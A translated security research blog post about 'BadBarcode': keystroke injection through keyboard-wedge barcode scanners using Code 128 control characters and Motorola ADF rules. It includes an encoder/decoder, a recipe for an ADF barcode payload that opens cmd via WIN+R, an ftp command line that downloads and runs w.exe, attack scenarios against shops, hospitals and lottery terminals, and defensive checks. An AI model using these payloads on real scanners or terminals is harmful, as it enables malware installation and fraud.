Barcode attack technique (Badbarcode)

Author: 数据流 @ 伏宸安全实验室
From: http://drops.wooyun.org/tips/12183

0x00 Preface


Barcodes are everywhere in daily life, above all in supermarkets, convenience stores and the logistics industry. But are they safe? The barcode attack that @TK presented at PacSec and demonstrated in the video he posted on Twitter was so cool that I bought a scanner to research it myself. While researching I went through everything I could find, domestic and foreign, but none of it covered the possible attack techniques. So here is one.

0x01 Introduction of Barcode


A barcode is a graphic identifier that represents a piece of information by varying the widths and spacings of parallel lines. A common one-dimensional barcode consists of black bars (called bars) and white gaps (called spaces) of differing reflectivity, which the scanner measures as a sequence of widths.

Common barcode symbologies include Code 39, Code 128, Code 93, EAN-128 (GS1-128), EAN-13 and QR Code. All but QR are one-dimensional, and this post focuses on one-dimensional scanners. Code 128 is the most widely used and supports the largest character set, so these attacks normally use Code 128 barcodes.

0x02 Introduction of the Scanner


Almost everyone has seen a barcode scanner in a supermarket, a logistics depot, a hospital or a lottery shop. A scanner reads the information in a barcode: a conventional one illuminates the code with a laser or LED, measures the reflected light, and an embedded decoder chip turns the bar widths into data and outputs it. Well-known scanner brands include Symbol, Honeywell and Datalogic; Symbol was acquired by Motorola (its scanner line later became part of Zebra Technologies).

You will notice at a supermarket checkout that the product code appears on the screen the moment the item is scanned. Many scanners deliver their output in keyboard-wedge mode (USB HID keyboard or PS/2 keyboard): to the host the scanner is simply a keyboard, and whatever the barcode decodes to is typed as keystrokes into whichever window has focus. That is the root of the risk.

0x03 Code 128 barcode


Since the scanner is a keyboard, manipulating the data in a barcode lets you enter any keyboard data. A UPC barcode carries only digits, and some other symbologies only digits and letters, whereas Code 128 can encode all 128 ASCII characters (0-127), which is where its name comes from, and is widely used for that reason. Barcode length is variable; up to 232 characters are supported.

Code 128 has three code sets:

  1. Code 128A: digits, uppercase letters, control characters and special characters
  2. Code 128B: digits, uppercase and lowercase letters and special characters
  3. Code 128C (used by EAN-128): the 100 digit pairs 00 to 99, so it can only represent an even number of digits

A single symbol can switch between code sets with the Code A, Code B, Code C and Shift characters, which is how lowercase text and a control character can share one barcode.

A Code 128 symbol has four parts: a start character, the data characters, a modulo-103 check character (mandatory in the specification) and the stop pattern.

In the barcode pictured in the original post, reading the widths of each bar and space from the left gives 211214: the first bar is two modules wide, the next space one module wide, and so on. Each Code 128 symbol character is three bars and three spaces totalling 11 modules, so the widths are read six at a time. Writing each bar as 1s and each space as 0s, 211214 becomes the module pattern 11010010000, which is a start character.

Comparison of the start codes:

  • 128A 11010000100 (widths 211412)
  • 128B 11010010000 (widths 211214)
  • 128C 11010011100 (widths 211232)

The stop pattern is always 1100011101011 (widths 2331112, 13 modules).

Since the pattern read above is 11010010000, this barcode starts in Code Set B.

From there the data characters are recovered by looking each 11-module pattern up in the Code 128 encoding table, and the check character is verified before the data is accepted.

0x04 Control characters and the production of barcodes


Using the Code 128 rules above you can write a program that reads and generates barcodes. Our goal, though, is to make the host perform actions, and the simplest way is with control characters: non-printing characters such as carriage return, line feed and tab. In ASCII, codes 0-31 and 127 are control characters.

The ASCII control characters correspond to almost every Ctrl+letter combination (0x0F is Ctrl+O, for example). Ctrl+O opens a file, but only in applications that define that shortcut, such as a browser or MS Word; in some kiosk terminals a control character is enough to break the program out of its sandbox. How do we make a barcode that sends Ctrl+O? With the Code 128 algorithm above you can write your own generator, and there are many small generators on the Internet; I recommend the barcode editor BarTender. One caveat: whether a 0x0F in the barcode arrives at the host as a Ctrl+O keystroke depends on the scanner's keyboard-wedge settings (on Symbol scanners the USB keyboard "Function Key Mapping" parameter controls how values below 32 are sent), so check the scanner configuration if the shortcut does not fire.

After installation, click "File" -> "New" -> "Finish" and a blank template appears.

Then click the barcode button to create a barcode and select Code 128.

Generate the barcode with BarTender; the characters can be edited and debugged at any time. The barcode above encodes the text "FutureSec" followed by the 0x0F control character, so when it is scanned the scanner types "FutureSec" and then sends Ctrl+O.

After the scan, the application's Open dialog pops up immediately.

Almost every scanner reproduces this, because Code 128 is supported by nearly all of them.
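The symbol structure described in 0x03 (start character, data, modulo-103 check character, stop pattern) and the control-character barcode of 0x04 can both be exercised with the following Python encoder/decoder. It is an added example, not code from the original post or from BarTender: the width table is the standard Code 128 table, encode() picks Code Set A or B automatically and switches sets with the Code A / Code B characters so that "FutureSec" and a 0x0F byte can share one symbol, and decode() takes the bar/space width sequence a scanner measures, verifies the stop pattern and the check character, and returns the text. Code Set C (digit pairs) is left out of the decoder.

```python
"""Minimal Code 128 encoder/decoder (added example, not from the original post).

Symbol layout: start character, data characters, modulo-103 check character, stop
pattern. A symbol character is 3 bars + 3 spaces = 11 modules; the stop pattern has
an extra bar (13 modules). Values 0..102 are data (meaning depends on the active code
set), 103/104/105 are Start A/B/C, 106 is Stop. Code set A covers ASCII 0x00-0x5F,
control characters included; code set B covers 0x20-0x7F.
"""

# Bar/space widths for values 0..106, in value order (the standard Code 128 table).
PATTERNS = (
    "212222 222122 222221 121223 121322 131222 122213 122312 132212 221213 221312 "
    "231212 112232 122132 122231 113222 123122 123221 223211 221132 221231 213212 "
    "223112 312131 311222 321122 321221 312212 322112 322211 212123 212321 232121 "
    "111323 131123 131321 112313 132113 132311 211313 231113 231311 112133 112331 "
    "132131 113123 113321 133121 313121 211331 231131 213113 213311 213131 311123 "
    "311321 331121 312113 312311 332111 314111 221411 431111 111224 111422 121124 "
    "121421 141122 141221 112214 112412 122114 122411 142112 142211 241211 221114 "
    "413111 241112 134111 111242 121142 121241 114212 124112 124211 411212 421112 "
    "421211 212141 214121 412121 111143 111341 131141 114113 114311 411113 411311 "
    "113141 114131 311141 411131 211412 211214 211232 2331112"
).split()
VALUE_OF = {p: i for i, p in enumerate(PATTERNS)}
START_A, START_B, STOP = 103, 104, 106
SHIFT, CODE_B, CODE_A = 98, 100, 101      # set-switching characters


def widths_to_modules(widths: str) -> str:
    """'211214' -> '11010010000': bars become 1s, spaces 0s, alternating."""
    return "".join(("1" if i % 2 == 0 else "0") * int(w) for i, w in enumerate(widths))


def start_code_set(widths: str):
    """Code set announced by the first symbol character, or None if not a start code."""
    return {"211412": "A", "211214": "B", "211232": "C"}.get(widths[:6])


def checksum(values):
    """Modulo-103 check character: start value plus position-weighted data values."""
    return (values[0] + sum(i * v for i, v in enumerate(values[1:], 1))) % 103


def _value(ch, code_set):
    o = ord(ch)
    if code_set == "A":                   # 0x00-0x1F map to 64..95, 0x20-0x5F to 0..63
        return o + 64 if o < 32 else (o - 32 if o < 96 else None)
    return o - 32 if 32 <= o < 128 else None   # code set B: 0x20-0x7F map to 0..95


def encode(text: str):
    """ASCII text (control characters allowed) -> values incl. check character and stop.
    Starts in B unless the first character is a control character, and emits a
    Code A / Code B switch whenever the current set cannot encode a character."""
    code_set = "A" if text and ord(text[0]) < 32 else "B"
    values = [START_A if code_set == "A" else START_B]
    for ch in text:
        v = _value(ch, code_set)
        if v is None:
            code_set = "B" if code_set == "A" else "A"
            values.append(CODE_B if code_set == "B" else CODE_A)
            v = _value(ch, code_set)
            if v is None:
                raise ValueError(f"not encodable in Code 128: {ch!r}")
        values.append(v)
    values.append(checksum(values))
    values.append(STOP)
    return values


def to_widths(values) -> str:
    """Values -> the bar/space width string a printer draws and a scanner measures."""
    return "".join(PATTERNS[v] for v in values)


def decode(widths: str) -> str:
    """Width string -> text. Verifies stop pattern and check character, then walks
    the data honouring Code A / Code B switches and the one-character Shift."""
    body, stop = widths[:-7], widths[-7:]
    if stop != PATTERNS[STOP] or not body or len(body) % 6:
        raise ValueError("bad stop pattern or symbol length")
    values = [VALUE_OF.get(body[i:i + 6], -1) for i in range(0, len(body), 6)]
    if -1 in values:
        raise ValueError("invalid symbol character")
    if checksum(values[:-1]) != values[-1]:
        raise ValueError("check character mismatch")
    code_set = {START_A: "A", START_B: "B"}.get(values[0])
    if code_set is None:
        raise ValueError("code set C (digit pairs) is not handled in this example")
    out, shift = [], None
    for v in values[1:-1]:
        active, shift = shift or code_set, None
        if v == CODE_A:
            code_set = "A"
        elif v == CODE_B:
            code_set = "B"
        elif v == SHIFT:
            shift = "B" if code_set == "A" else "A"
        elif (active == "B" and v < 96) or (active == "A" and v < 64):
            out.append(chr(v + 32))
        elif active == "A" and v < 96:
            out.append(chr(v - 64))       # values 64..95 are the control characters
        else:
            raise ValueError(f"unhandled value {v} in code set {active}")
    return "".join(out)
```

Rendering a symbol is then just drawing each width as that many modules of bar or space. Note what the check character does and does not buy you: a single corrupted character is caught on decode, but a deliberately constructed barcode carrying a 0x0F is exactly as valid as any other, so the check character is no defence against BadBarcode; that has to happen on the host.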

0x05 Advanced Data Formatting


Advanced Data Formatting (ADF) is a feature of Motorola (Symbol) scanners that lets you program, rule by rule, how scanned data is transformed before it is sent to the host. Each rule is a set of criteria (which scans it applies to) and an ordered list of actions; in effect it is a small programming language whose programs are entered by scanning barcodes.

For example, suppose a checkout system expects item identifiers of the form A12345, beginning with an A, while the barcode on the item only contains the digits 12345. The checkout system cannot use the raw scan, so ADF is used to prepend the A before the data is sent to it.

Here is another example:

Barcode data:

8523647122

Output data from ADF:

8523641

How is ADF implemented?

There is no Chinese material on ADF on the Internet, and only a little on English sites. @TK's slides mention ADF, but not in enough detail to reproduce it. Eventually I found Motorola's ADF programmer guide, about 300 pages long.

ADF is a programming method in which rules are built up to suit your needs and entered as barcodes rather than as code. Every rule element (prefix/suffix, replacement, character input, pause and so on) is represented by a programming barcode.

Using ADF to hijack the scanner's output

Before programming ADF rules into the scanner, scan the "Begin New Rule" barcode to enter rule-entry mode.

Each subsequent programming barcode adds a step to the rule, as long as the resulting rule is logically valid.

Next, scan the following barcodes in order (the criteria and the action that sends the text "TEST").

Then scan "Save Rule".

Once the rule is saved, every scan the scanner makes is replaced by "TEST", whatever the barcode contained: with ADF set, the rule's actions are executed step by step on every scan.

How do you undo it?

Scan the "Erase All Rules" programming barcode, which removes every rule.

0x06 Use ADF to execute commands to plant malware


Control characters alone only reach application shortcuts, but ADF supports simple programming and a far larger key set, so system commands can be executed easily. The most useful key is WIN+R.

In ADF it is called GUI R (GUI being the Windows key). With WIN+R available, the rule above opens the Run dialog and types cmd. That alone is not enough, though: the scanner injects keystrokes far faster than a human types, so "c", "m", "d" arrive before the Run dialog has opened and taken focus. A delay is required, and ADF provides one, the equivalent of sleep() in a program.

When entering the ADF rule, the pause length is given as two numeric barcodes in tenths of a second: 0 then 1 is 0.1 s, 0 then 5 is 0.5 s; the default is 1 second.

With these ADF barcodes you can construct a rule that pops a cmd window and uses control characters, chiefly Enter, to execute commands. Done this way, however, popping cmd takes about 10 programming barcodes, which the scanner has to read one after another. Here is a demo from Tencent Xuanwu Lab:

https://twitter.com/tombkeeper/status/663730674017300480

In the video a pile of barcodes is scanned ten times in sequence to obtain a cmd prompt. The exact count probably depends on the scanner model.

If that were the only way, both generating rules and exploiting them would be tedious. In fact the rules can be combined into fewer barcodes with Motorola's scanner management software, 123Scan.

123Scan is a powerful scanner management utility from Motorola, available from its website, with many functions. The next part shows how to use 123Scan to set up ADF.

Open it and click "Create new configuration file" -> "My scanner is NOT connected" -> select the scanner model -> "Modify data" -> "Program complex data modifications" -> "Create a new rule".

Click "Add action" to add an action to the rule.

Every ADF action is available here, including Beep control (the scanner's buzzer), Replace and so on.

Set a 0.5 s delay and add the actions in order.

Finally, 123Scan combines everything into programming barcodes and outputs them.

Those barcodes are the payload for executing arbitrary commands. Apart from the first (restore factory defaults) and the second (erase all rules), only 4 barcodes are needed to execute any single command. The ADF sequence they program is: send GUI R -> pause 0.5 s -> send c -> send m -> send d -> send Enter -> pause 0.5 s -> Send all that remains. "Send all that remains" emits the scanned barcode's own data after the rule's actions, so whatever the next barcode contains is typed into the cmd window; that is how a multi-line command is delivered. For a single-line command the 4 barcodes on their own are enough and "Send all that remains" is not needed.

Using ADF to plant malware

Since cmd commands can now be executed, the simplest way to plant malware is to use ftp to download and run an arbitrary executable. The command text that "Send all that remains" will type can be generated as a barcode with BarTender («CR» is BarTender's notation for the carriage return character, 0x0D, i.e. an Enter keystroke):

ftp test«CR»a«CR»a«CR»get w.exe«CR»bye«CR»w.exe«CR»get w.exe«CR»bye«CR»w.exe«CR»

Typed into cmd, this connects to the host named test, logs in with username a and password a, downloads w.exe, quits ftp and runs w.exe; the repeated tail lands in cmd after ftp has exited (cmd rejects get and bye) and simply launches w.exe again. Note that ftp.exe speaks plain FTP, so the download is visible on the network to anyone watching.

The demo video below shows the 4 ADF programming barcodes being scanned; after that, whatever barcode is scanned is executed via "Send all that remains", here the FTP commands above.

(Tested model: Symbol-LS4208-SR20001ZZR)

http://v.youku.com/v_show/id_XMTQ0ODY0ODg1Ng==.html?from=y1.7-1.2

Password: wooyun520

0x07 Attack Scenarios


Here is a summary of the possible attack scenarios:

1. Paying at the checkout

Use a crafted barcode to substitute one product for another. Many convenience stores also accept WeChat Pay and Alipay payment barcodes; their scanners read several symbologies and will scan a barcode displayed on a phone. Some supermarkets have price-check terminals: scanning a crafted barcode at one can break out of the kiosk application.

2. Hospital records and test orders

Hospital registration slips and medical records both carry barcodes. Self-service terminals in hospitals accept them, or you hand them to a nurse; almost every hospital has terminals that generate a test order from a scanned barcode.

3. Lottery tickets

Lottery tickets carry barcodes and the checking machine identifies the ticket by them, so forging tickets and attacking the checking machine are both conceivable; there are many types of lottery terminal.

4. Express delivery labels

Delivery labels also use barcodes, normally Code 128 or Code 39. Some self-service parcel lockers may be at risk.

There are many other scenarios I will not list here; given the chance I will analyse each one separately.

0x08 Precaution measures


  1. Disable the scanner's ADF function (and configuration by scanning programming barcodes in general) by default, and lock the configuration so it cannot be changed through the scan window.
  2. Avoid keyboard emulation: connect the scanner in serial, USB-COM, OPOS/JPOS or HID-POS mode so the application receives the decoded string as data rather than as keystrokes, and treat that string as untrusted input.
  3. Set up a hotkey blacklist on the host, or run the application in kiosk mode, so injected WIN+R, Ctrl+O, Alt+Tab and similar combinations have no effect, and strip control characters from scanner output.
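As an added example (not from the original post), here are two host-side checks in Python that implement precautions 2 and 3: validate_scan() treats the decoded string as untrusted input, rejecting control characters and anything outside the format the application expects (an all-digit EAN/UPC-style code is assumed here), and suspicious_bursts() is for hosts that cannot get away from keyboard-wedge mode, flagging keystroke bursts that arrive at scanner speed and contain hotkeys. The key names, the timing thresholds and the sample key events are assumptions made for this example.

```python
"""Host-side checks for scanner input (added example, not from the original post).

validate_scan() treats the decoded string as untrusted data: control characters are
rejected outright and the rest must match the format the application expects.
suspicious_bursts() is for hosts stuck with a keyboard-wedge scanner: it groups key
events that arrive faster than any human types and flags groups carrying hotkeys.
Key names, thresholds and the sample events are assumptions made for this example.
"""
import re

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
EXPECTED_FORMAT = re.compile(r"(\d{8}|\d{12,14})")  # assumed: EAN-8/UPC-A/EAN-13/GTIN-14
HOTKEYS = {"GUI", "CTRL", "ALT", "ESC", "TAB", "ENTER"}  # keys a product code never needs
SCANNER_GAP_MS = 20      # a keyboard wedge types at a few ms per key; humans at 100+ ms


def validate_scan(raw: str, expected=EXPECTED_FORMAT):
    """Return (ok, reason). Control characters are checked first so an embedded
    Ctrl+O or Enter is reported as such rather than as a malformed code."""
    if CONTROL_CHARS.search(raw):
        return False, "control character in scan data"
    if not expected.fullmatch(raw):
        return False, "scan data does not match expected code format"
    return True, "ok"


def suspicious_bursts(events, max_gap_ms=SCANNER_GAP_MS):
    """events: list of (timestamp_ms, key) in arrival order. Returns the key lists
    of bursts (consecutive keys <= max_gap_ms apart) that contain a hotkey.
    A single trailing ENTER is tolerated because scanners commonly add it as a
    suffix; a GUI, CTRL or ALT at scanner speed is never part of a product code."""
    bursts, current = [], []
    for i, ev in enumerate(events):
        if current and ev[0] - events[i - 1][0] > max_gap_ms:
            bursts.append(current)
            current = []
        current.append(ev[1])
    if current:
        bursts.append(current)
    flagged = []
    for keys in bursts:
        body = keys[:-1] if len(keys) > 1 and keys[-1] == "ENTER" else keys
        if len(keys) > 1 and any(k in HOTKEYS for k in body):
            flagged.append(keys)
    return flagged


def sample_events():
    """Constructed key log: a human typing "12", a legitimate EAN-13 scan with an
    Enter suffix, then an ADF-style injection of GUI+R, a 0.5 s pause, "cmd", Enter."""
    t, ev = 0, []

    def burst(keys, gap):
        nonlocal t
        for k in keys:
            ev.append((t, k))
            t += gap

    burst("12", 150)
    t += 1000
    burst("4006381333931", 5)
    burst(["ENTER"], 5)
    t += 1000
    burst(["GUI", "r"], 5)
    t += 500                      # the ADF pause that waits for the Run dialog
    burst(["c", "m", "d", "ENTER"], 5)
    return ev
```

Note the failure mode visible in the sample: the 0.5 s ADF pause between GUI+R and "cmd" splits the injection into two bursts, and the "cmd" plus Enter half looks exactly like a normal scan with an Enter suffix. That is why the detector anchors on modifier keys appearing at scanner speed rather than on burst length alone, and why taking the scanner out of keyboard-wedge mode (precaution 2) is the better fix: once the application receives a string instead of keystrokes, validate_scan() is all it needs.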

0x09 Conclusion


The idea of attacking through barcodes was raised years ago, but nobody dug into it. A barcode that carries SQL, script or oversized data can drive SQL injection, XSS and overflow attacks against the back end that processes the scan.

Whatever the device, once any part of its input can be controlled by an attacker, it is at risk.
